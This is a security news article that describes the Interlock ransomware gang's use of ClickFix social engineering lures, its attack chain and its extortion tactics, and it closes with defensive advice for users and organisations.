Interlock Gang’s ClickFix Trickery

Summary

The Interlock ransomware gang has adopted the ClickFix attack, a social engineering tactic tricking users into executing malicious commands disguised as IT tool fixes. This dangerous trend bypasses traditional security measures, highlighting the increasing sophistication of ransomware attacks. Protecting yourself requires vigilance and a healthy dose of skepticism.

Explore the data solution with built-in protection against ransomware TrueNAS.

** Main Story**

The Interlock ransomware gang, known for targeting FreeBSD and Windows systems since late September 2024, has added a new weapon to its arsenal: the ClickFix attack. This social engineering tactic involves deceiving users into executing malicious PowerShell commands disguised as solutions to IT problems. Researchers observed this shift in Interlock’s tactics as early as January 2025, with the gang setting up fake websites mimicking legitimate platforms like Microsoft Teams and Advanced IP Scanner.

ClickFix: A Deep Dive

ClickFix attacks exploit a simple yet effective social engineering tactic. Victims encounter fake CAPTCHA prompts or error messages on websites and are instructed to copy and paste commands into their system’s command prompt or terminal. These commands, instead of resolving the purported issue, download and execute malicious code. This method bypasses security measures that typically flag malicious downloads by having the user initiate the execution themselves. The supposed fix often involves running a PowerShell script, which sets the stage for malware installation and further compromise.

Interlock’s ClickFix campaign involves creating convincing replicas of well-known IT tools, furthering the deception. One identified lure mimics the popular Advanced IP Scanner software. When a user clicks the provided “fix it” button, a malicious installer package downloads, installing a seemingly functional version of Advanced IP Scanner alongside hidden malware. This malware includes components like Lumma Stealer and Berserk Stealer, designed to steal sensitive information like login credentials and financial data.

The Interlock Attack Chain

After the initial infection, the Interlock gang utilizes various tools like PuTTY, AnyDesk, and LogMeIn for lateral movement within the compromised network. This movement relies on stolen credentials acquired through the initial malware payload or other means. Data exfiltration to attacker-controlled Azure Blob storage typically precedes the ransomware deployment. As a final step, the ransomware gets scheduled to run daily at a specific time, ensuring persistence and redundancy in the attack chain.

Ransomware as a Service

Unlike many modern ransomware gangs, Interlock doesn’t operate on a Ransomware-as-a-Service (RaaS) model. They directly manage their operations, including attacks and ransom demands, which have reached millions of dollars in some cases. Their dark web portal, the “Worldwide Secrets Blog,” serves as a platform for publishing stolen data as a means to pressure victims into paying. Recent ransom notes also demonstrate an evolution in Interlock’s tactics, now emphasizing potential legal and regulatory ramifications of a data breach.

Protecting Yourself from ClickFix Attacks

The rise of ClickFix attacks underscores the growing reliance on social engineering by cybercriminals. Protecting yourself and your organization requires a multi-pronged approach:

• Be skeptical: Exercise caution when encountering online prompts that ask you to copy and paste commands. Verify the authenticity of the website and source before taking any action.
• Keep software updated: Ensure all software, including operating systems and browsers, is up-to-date with the latest security patches.
• Employ strong passwords: Utilize unique and strong passwords for all accounts and enable multi-factor authentication whenever possible.
• Educate yourself: Stay informed about emerging threats and social engineering tactics like ClickFix to better recognize and avoid them.
• Endpoint security: Deploy robust endpoint security solutions that include behavior-based detection capabilities to catch malicious activity even if it bypasses traditional signature-based defenses.
• Incident response plan: Having a plan in place is crucial to contain the damage if an attack occurs. This plan should include procedures for isolating infected systems, restoring data from backups, and engaging with law enforcement or cybersecurity professionals.

The growing sophistication of ransomware attacks like those perpetrated by Interlock necessitates a proactive and vigilant approach to cybersecurity. By staying informed and adopting preventive measures, individuals and organizations can significantly reduce their risk of falling victim to these evolving threats.